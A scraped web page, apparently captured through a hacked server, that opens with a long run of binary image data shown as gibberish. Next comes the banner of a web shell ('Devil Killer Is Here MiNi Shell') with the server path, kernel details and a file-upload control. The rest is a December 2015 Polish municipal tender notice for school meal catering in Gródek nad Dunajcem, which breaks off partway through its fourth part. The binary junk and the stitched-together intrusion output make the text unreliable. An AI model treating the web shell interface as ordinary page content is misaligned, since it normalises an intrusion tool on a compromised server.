JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151215/343692-N-2015.html

<p class="kh_header"><b>Gródek nad Dunajcem: Dożywianie dzieci w przedszkolu, szkołach podstawowych i gimnazjach w gminie Gródek nad Dunajcem w I połowie 2016 roku.</b><br>
<b>Numer ogłoszenia: 343692 - 2015; data zamieszczenia: 15.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Gródek nad Dunajcem , Gródek nad Dunajcem 54, 33-318 Gródek nad Dunajcem, woj. małopolskie, tel. 18 4401035, faks 18 4401035 w. 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminagrodek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dożywianie dzieci w przedszkolu, szkołach podstawowych i gimnazjach w gminie Gródek nad Dunajcem w I połowie 2016 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie przetargowe jest prowadzone w imieniu i na rzecz następujących podmiotów

1.	Ośrodek Pomocy Społecznej w Gródku nad Dunajcem; 
Gródek nad Dunajcem 170; 
33-318 Gródek nad Dunajcem
(szkoły podstawowe i gimnazja)
2.	Zespół Szkół w Gródku nad Dunajcem
Gródek nad Dunajcem 195
33-318  Gródek nad Dunajcem
(oddział przedszkolny)

Zasady ogólne:

1.	Przedmiotem zamówienia jest przygotowanie i wydawanie posiłków dla dzieci w placówkach oświatowych prowadzonych przez gminę Gródek nad Dunajcem w formach i ilościach wskazanych z zamówieniu.
2.	Zamówienie obejmuje przygotowanie i wydanie posiłków albo przygotowanie, transport i wydanie posiłków w siedzibach placówek oświatowych dla dzieci z terenu gminy Gródek nad Dunajcem, posiłków o dla dzieci w dziennych ilościach wskazanych w zamówieniu.
3.	Wykonawca zobowiązany jest do przygotowania i dostarczenia posiłków o odpowiednim standardzie, na bazie produktów najwyższej jakości i bezpieczeństwa zgodnie z normami HACCP.
4.	Do Wykonawcy należy odbiór naczyń oraz wszelkie niezbędne zabiegi higieniczne związane z wydawaniem posiłków i odbiorem naczyń.
5.	Proponowane menu stanowi jedynie otwarty katalog proponowanych posiłków i może zostać poszerzone o dodatkowe pozycje w uzgodnieniu pomiędzy Zamawiającym i Wykonawcą. Wykonawca może zaoferować odmienne menu, lecz o równoważnej wartości energetycznej poszczególnych składników żywieniowych. Wykonawca zapewni urozmaicony jadłospis (posiłki nie powinny powtarzać się w ciągu 1 tygodnia, chyba, że zamawiający zastrzeże inaczej). Do złożonej oferty Wykonawca załączy proponowany jadłospis, uwzględniający wytyczne Zamawiającego wynikające z SIWZ.
6.	Wszystkie etapy procesu produkcyjnego powinny przebiegać bez zbędnych przestojów, celem zabezpieczenia przed zanieczyszczeniem, zepsuciem i rozwojem drobnoustrojów chorobotwórczych.
7.	Transport posiłków powinien być prowadzony samochodami dostosowanymi do przewożenia środków spożywczych. Środek transportu winien być dopuszczony przez SANEPID do przewozu posiłków (żywności).
8.	Posiłki będą dostarczane i wydawane przez pięć dni w tygodniu od poniedziałku do piątku, wyłącznie w dni w których odbywa się nauka w szkołach czy zajęcia w przedszkolu w pomieszczeniach do tego wyznaczonych przez dyrektora placówki. Jeśli dzieci będą uczęszczać do placówki w inny dzień np. odpracowywać zajęcia szkolne, dzieci objęte są tą formą pomocy lecz ten fakt szkoły zgłaszają z 3 dniowym wyprzedzeniem dowożącemu i wydającemu posiłki.
9.	Godzina wydawania posiłków w szkołach jest ustalana przez wykonawcę indywidualnie dla każdej placówki bezpośrednio z dyrekcją szkoły.
10.	Zamawiający zastrzega, że ilość dostarczanych posiłków może zmieniać się w trakcie obowiązywania zamówienia (zwiększenie lub zmniejszenie do 20% wynikających z zamówienia). Każdorazowo na bieżąco dostarczający posiłki będzie informowany o ilości posiłków które ma dostarczyć. W dniu wydawania posiłku w pomieszczeniu jego wydawania w miejscu widocznym dostarczający wywiesza menu na każdy dzień dożywiania.
11.	Zamawiający zastrzega sobie prawo korekty ilości posiłków w zależności od bieżących potrzeb, przy czym ogólna ilość posiłków dostarczonych w trakcie zamówienia nie może przekroczyć ilości wskazanej w zamówieniu jako maksymalna.
13.	Zamawiający zastrzega, że ilość dzieci objętych dożywianiem może zmieniać się w czasie, w szczególności w razie zmian prawnych dotyczących osób objętych bezpłatną pomocą w zakresie posiłków szkolnych. W związku z tym Wykonawca nie będzie rościł sobie prawa do żądania odbioru maksymalnej wskazanej ilości posiłków przez Zamawiającego.
14.	Podana przez Zamawiającego maksymalna ilość przewidzianych do wydania posiłków ma charakter informacyjny i służy przede wszystkim do ustalenia maksymalnego zakresu zamówienia. Zamawiający nie odpowiada jednakże za to, iż faktyczna ilość wydanych posiłków może być mniejsza niż zakładana.
15.	Na podstawie art. 5 ust 1 ustawy Prawo Zamówień Publicznych zamawiający skorzysta w niniejszym posterowania z prawa do skrócenia terminu składania ofert.
16.	Zamawiający dopuszcza składanie ofert częściowych na realizację zamówienia w zakresie określonym jak w załącznikach 1, 2 i 3 do niniejszej specyfikacji. Można złożyć ofertę na całą część I lub II lub III lub IV lub na kilka części. Nie można złożyć oferty tylko na część IV A lub IV B (Zespół Szkół w Gródku nad Dunajcem z oddziałem przedszkolnym)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający zastrzega sobie prawo dokonania zamówień uzupełniających nie przekraczających swą wielkością 20 % wartości zamówienia podstawowego, w szczególności jeśli zajdzie potrzeba zwiększenia liczby wydawanych posiłków w szkołach podstawowych i gimnazjach ze względu na większą liczbę dzieci objętych dożywianiem</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3, 55.52.40.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.07.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>4.	Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Formularz oferty wg wzoru stanowiącego załącznik nr 1 do specyfikacji,
5.	Pełnomocnictwo - do reprezentowania wykonawcy w postępowania albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminagrodek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Gródek nad Dunajcem
Urząd Gminy Gródek nad Dunajcem
Gródek nad Dunajcem 54
33-318 Gródek nad Dunajcem.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2015 godzina 12:00, miejsce: Urząd Gminy Gródek nad Dunajcem
Gródek nad Dunajcem 54
33-318 Gródek nad Dunajcem
Dziennik Podawczy - pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje zamawiający i wykonawcy przekazują pisemnie lub faksem. W razie przekazania oświadczenia, wniosku, zawiadomienia lub informacji w formie faksu, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
Korespondencję pisemną należy kierować na adres:
Urząd Gminy Gródek nad Dunajcem,
Gródek nad Dunajcem 54; 
33-318 Gródek nad Dunajcem
Korespondencję w formie faksu należy kierować na nr faksu +48 018 440 10 35 w. 20
Ofertę można złożyć wyłącznie w formie pisemnej.

Specyfikację istotnych warunków zamówienia zamieszczono na stronie www Zamawiającego pod adresem http://www.gminagrodek.pl/ na podstronie /Przetargi.

Osoby uprawnione do kontaktowania się z oferentami:
Sprawy merytoryczne
1. (szkoły podstawowe i gimnazja) Imię i nazwisko: Krystyna Pajor
Stanowisko służbowe: p.o. Kierownik Ośrodka Pomocy Społecznej
2. (Przedszkole w Gródku nad Dunajcem) Imię i nazwisko: Zofia Wolak
Stanowisko służbowe: Dyrektor Zespołu Szkół

Sprawy proceduralne
Imię i nazwisko: Lesław Czul
Stanowisko służbowe: inspektor Urzędu Gminy - pok. 39
Dane kontaktowe: (018) 440-10-35 w.39, faks: /018/ 440-10-35, w.20, mail: przetargi@gminagrodek.pl

WYJAŚNIENIA ORAZ ZMIANA TREŚCI SPECYFIKACJI:
Każdy wykonawca ma prawo zwrócić się do Zamawiającego o wyjaśnienie treści specyfikacji. Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem, że wniosek o wyjaśnienie treści specyfikacji wpłynął do Zamawiającego nie później niż do końca dnia, w którym upływa połowa wyznaczonego terminu składania ofert. Wyjaśnienia treści specyfikacji oraz jej ewentualne zmiany będą dokonywane na zasadach i w trybie art. 38 ustawy - PZP..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostarczenie II śniadania (kanapek) zgodnie z jadłospisem dla dzieci do szkół w Lipiu, Roztoce-Brzezinach, Rożnowie i Siennej:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowe zestawienie dzieci objętych dożywianiem:
1.	Szkoła w Lipiu			26 dzieci, (codziennie)
2.	Szkoła w Roztoce - Brzezinach	  	27 dzieci, (codziennie)
3.	Szkoła w Rożnowie	 	 	50 dzieci, (tylko we wtorki i czwartki)
4.	Szkoła w Siennej			15 dzieci (codziennie)

Co daje:
a) 68 dzieci x 108 dni =  7344 posiłki 
b) 50 dzieci x 108 dni =  2100 posiłki 
czyli łącznie 9444 posiłki

w okresie od 4 stycznia do 23 czerwca  2016 roku w dniach nauki szkolnej

1)	Zamówienie obejmuje przygotowanie II śniadania (kanapek) i wydanie ich dzieciom w ilościach wskazanych w specyfikacji.
2)	Proponowane (przykładowe) menu w zakresie II śniadania oczekiwane przez Zamawiającego powinno obejmować następujące pozycje:

Drożdżówka z nadzieniem mieszanym 1 raz w tygodniu np.  piątek + owoc ( jabłko, banan lub mandarynka )
Bułka duża, masło, wędliną i  pomidorem   - poniedziałek 
Bułka duża, masło, ser żółty   - środa
Bułka duża, masło, wędliną i ogórkiem świeżym  lub konserwowym - czwartek

3)	Do obowiązków wykonawcy należy również wydawanie posiłków dzieciom.
4)	Koszt transportu wchodzi w cenę posiłków
5)	Posiłki powinny być przewożone w opakowaniach posiadających odpowiednie atesty Państwowego Zakładu Higieny, Zakładu Badania Żywności i Przedmiotów Użytku lub innego podmiotu uprawnionego.
6)	Ze względu na brak warunków we wskazanych szkołach nie ma możliwości przygotowania posiłków na miejscu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3, 55.52.40.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie gotowych ciepłych posiłków i ich wydawanie (catering) w szkołach w Jelnej, Rożnów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowe zestawienie dzieci objętych dożywianiem:
1.	Szkoła w Jelnej		55 dzieci, (codziennie),
2.	Szkoła w Rożnowie		50 dzieci, (w poniedziałki, środy i piątki).

Co daje:
a) 55 dzieci x 108 dni = 5940 posiłków
b) 50 dzieci x 65 dni = 3250 posiłków
czyli łącznie 9190 posiłków

w okresie od 4 stycznia do 23 czerwca  2016 roku w dniach nauki szkolnej

1.	Proponowane menu w zakresie ciepłych posiłków oczekiwane przez Zamawiającego powinno obejmować  , posiłki (zupa) o kaloryczności ok 500 kcal i gramaturze ok. 400 g , 100g chleb dla dzieci w dziennych ilościach wskazanych w zamówieniu oraz drugie danie o gramaturze nie mniejszą niż 500 gram , w tym mięso - 100g , surówka-100 g  oraz ziemniaki , ryż, kasza lub makaron 300 g .Dwa razy w tygodniu zupa z wkładką  , 2 razy drugie danie mięsne . Jeden raz w tygodniu drugie danie mogą stanowić pierogi , kopytka, naleśniki z serem w ilości 400 gram. Kaloryczność każdego posiłku nie powinna być mniejsza niż 600 kcal
2.	Temperatura posiłków przywiezionych w termosach nie powinna być niższa niż 60 st. C w momencie dostarczenia.
3.	Sałatki i surówki należy przywozić w odrębnych naczyniach.
4.	Do Wykonawcy należy dostarczanie sztućców i naczyń, na których będą wydawane posiłki. 
5.	Transport, naczynia oraz sztućce wchodzą w cenę posiłków.
6.	Do Wykonawcy należy odbiór naczyń oraz wszelkie niezbędne zabiegi higieniczne związane z wydawaniem posiłków i odbiorem naczyń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3, 55.52.40.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przygotowanie na miejscu i wydawanie  ciepłych posiłków w Zespole Szkół w Podolu - Górowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowe zestawienie dzieci objętych dożywianiem:
1 . Szkoła w Podolu- Górowej	88  dzieci,
Razem:88 dzieci x 108 dni =  9504 posiłki 
w okresie od  4  stycznia  do 23  czerwca  2016 roku w dniach nauki szkolnej
1. Proponowane menu w zakresie ciepłych posiłków oczekiwane przez Zamawiającego powinno obejmować  , posiłki (zupa) o kaloryczności ok 500 kcal i gramaturze ok. 400 g , 100g chleb dla dzieci w dziennych ilościach wskazanych w zamówieniu oraz drugie danie o gramaturze nie mniejszą niż 500 gram, w tym mięso - 100g , surówka-100 g oraz ziemniaki , ryż kasza lub makaron 300 g .Dwa razy w tygodniu zupa z wkładką  , 2 razy drugie danie mięsne . Jeden raz w tygodniu drugie danie mogą stanowić pierogi , kopytka , naleśniki z serem w ilości 400 gram. 
Kaloryczność każdego posiłku nie może być mniejsza niż 600 kcal.

2 .Do Wykonawcy należy odbiór naczyń oraz wszelkie niezbędne zabiegi higieniczne związane z wydawaniem posiłków i odbiorem naczyń.
3. Warunki płatności -  faktury częściowe miesięczne po wykonaniu zamówienia, potwierdzeniu wykonania przez Dyrektora Zespołu Szkół i wystawieniu faktury..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.21.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przygotowanie ciepłych posiłków i ich wydawanie w przedszkolu i szkole w Gródku nad Dunajcem (catering).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SZKOŁA PODSTAWOWA  I GIMNAZJUM W GRÓDKU NAD DUNAJCEM - 52 dzieci 

Ciepły posiłek dla 52 dzieci w ciągu 108 dni = 5616 posiłków
w okresie 4  stycznia - 23 czerwca  2016 roku w dniach nauki szkolnej 

